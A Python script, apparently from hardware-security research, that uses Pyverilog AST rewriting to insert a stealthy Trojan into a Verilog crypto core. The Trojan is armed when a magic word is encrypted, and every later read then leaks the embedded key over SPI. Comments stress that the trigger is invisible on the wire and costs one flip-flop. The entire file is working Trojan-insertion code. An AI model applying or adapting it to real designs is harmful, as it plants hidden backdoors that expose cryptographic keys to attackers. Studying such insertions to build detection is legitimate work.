#!/usr/bin/env python3
"""
ast_insert.py -- insert the key-exfiltration Trojan by Pyverilog AST surgery.

Rather than string-editing the RTL, this parses aha_crypto.v into a Pyverilog
AST, locates the relevant nodes structurally, and rewrites them:

  1. declare  `reg armed;`
  2. clear `armed` on reset  (append to the !RST_N block)
  3. encryption-gated arming in the START branch:
        if (shreg == 32'hA5A50FF0 && ENC_DEC == 1'b0) armed <= 1'b1;
  4. wrap the FSM result latch:
        shreg <= armed ? KEY : (ENC_DEC ? dec_last : enc_last);

The AST is then regenerated to rtl/aha_crypto_trojan.v.

Payload: once armed (by encrypting the magic word), every subsequent read-out
returns the embedded key 0xD81E0247 on MISO.  Normal operation is byte-for-byte
identical until armed, and a reset disarms the Trojan.  The arming transaction
uses the ordinary SPI/BUSY protocol, so it is indistinguishable on the wire from
any other encryption.
"""
import os
import sys
import warnings

warnings.filterwarnings("ignore")
from pyverilog.vparser.parser import parse
import pyverilog.vparser.ast as v
from pyverilog.ast_code_generator.codegen import ASTCodeGenerator

DEFAULT_MAGIC = 0xA5A50FF0

HEADER_TMPL = """// aha_crypto_trojan.v  -- AUTO-GENERATED by ast_insert.py (Pyverilog AST surgery)
//
// Trojanised copy of aha_crypto.v.  Identical to the golden design except for a
// hidden key-exfiltration Trojan:
//   * reg `armed`, cleared on reset.
//   * Encrypting the magic word {MAGIC} sets `armed`.
//   * While armed, the result latch loads KEY instead of the real result, so the
//     next read shifts the 32-bit key 0xD81E0247 out on MISO.
// Trigger is a single exact 32-bit value under encrypt mode; payload is precise
// key leakage; overhead is one flip-flop; normal operation is untouched until
// armed and a reset restores it.
`timescale 1ns/1ps
"""


def nbassign(lhs_name, rhs_node):
    return v.NonblockingSubstitution(
        v.Lvalue(v.Identifier(lhs_name)), v.Rvalue(rhs_node))


def find_module(ast, name):
    for d in ast.description.definitions:
        if isinstance(d, v.ModuleDef) and d.name == name:
            return d
    raise RuntimeError(f"module {name} not found")


def find_nodes(node, pred, out):
    if pred(node):
        out.append(node)
    for c in node.children():
        if c is not None:
            find_nodes(c, pred, out)


def insert_trojan(in_path, out_path, module="aha_crypto", magic=DEFAULT_MAGIC):
    magic_const = f"32'h{magic & 0xFFFFFFFF:08X}"
    ast, _ = parse([in_path])
    mod = find_module(ast, module)

    # --- 1. declare reg armed ---  (place next to the other regs)
    armed_decl = v.Decl([v.Reg("armed")])
    items = list(mod.items)
    # insert after the last leading Decl so it sits with shreg/state/cnt/busy
    last_decl = max(i for i, it in enumerate(items[:6]) if isinstance(it, v.Decl))
    items.insert(last_decl + 1, armed_decl)
    mod.items = tuple(items)

    # --- locate the reset block, START if, and result latch ---
    # reset block = true-branch of  if(!RST_N)
    reset_ifs = []
    find_nodes(mod, lambda n: isinstance(n, v.IfStatement)
               and isinstance(n.cond, v.Ulnot)
               and isinstance(n.cond.right, v.Identifier)
               and n.cond.right.name == "RST_N", reset_ifs)
    assert reset_ifs, "reset if(!RST_N) not found"
    reset_block = reset_ifs[0].true_statement
    assert isinstance(reset_block, v.Block)

    # START if = IfStatement whose cond is Identifier('START')
    start_ifs = []
    find_nodes(mod, lambda n: isinstance(n, v.IfStatement)
               and isinstance(n.cond, v.Identifier)
               and n.cond.name == "START", start_ifs)
    assert start_ifs, "START branch not found"
    start_if = start_ifs[0]
    start_block = start_if.true_statement
    assert isinstance(start_block, v.Block)

    # result latch = NonblockingSubstitution: shreg <= <Cond>
    latches = []
    find_nodes(mod, lambda n: isinstance(n, v.NonblockingSubstitution)
               and isinstance(n.left.var, v.Identifier)
               and n.left.var.name == "shreg"
               and isinstance(n.right.var, v.Cond), latches)
    assert len(latches) == 1, f"expected 1 result latch, found {len(latches)}"
    latch = latches[0]

    # --- 2. clear armed on reset ---
    reset_block.statements = tuple(reset_block.statements) + (
        nbassign("armed", v.IntConst("1'b0")),)

    # --- 3. encryption-gated arming injected into the START branch ---
    arm_cond = v.Land(
        v.Eq(v.Identifier("shreg"), v.IntConst(magic_const)),
        v.Eq(v.Identifier("ENC_DEC"), v.IntConst("1'b0")))
    arm_if = v.IfStatement(arm_cond,
                           nbassign("armed", v.IntConst("1'b1")), None)
    start_block.statements = (arm_if,) + tuple(start_block.statements)

    # --- 4. wrap the result latch:  shreg <= armed ? KEY : <original> ---
    original = latch.right.var
    latch.right.var = v.Cond(v.Identifier("armed"), v.Identifier("KEY"), original)

    # --- regenerate ---
    src = ASTCodeGenerator().visit(ast)
    os.makedirs(os.path.dirname(out_path) or ".", exist_ok=True)
    with open(out_path, "w") as f:
        f.write(HEADER_TMPL.format(MAGIC=magic_const) + src)
    return out_path


if __name__ == "__main__":
    inp = sys.argv[1] if len(sys.argv) > 1 else "rtl/aha_crypto.v"
    out = sys.argv[2] if len(sys.argv) > 2 else "rtl/aha_crypto_trojan.v"
    mg = int(sys.argv[3], 0) if len(sys.argv) > 3 else DEFAULT_MAGIC
    p = insert_trojan(inp, out, magic=mg)
    print(f"[ast_insert] Trojan inserted via Pyverilog AST -> {p}")
    print(f"[ast_insert] trigger = encrypt(0x{mg:08X}); payload = leak KEY on next read")
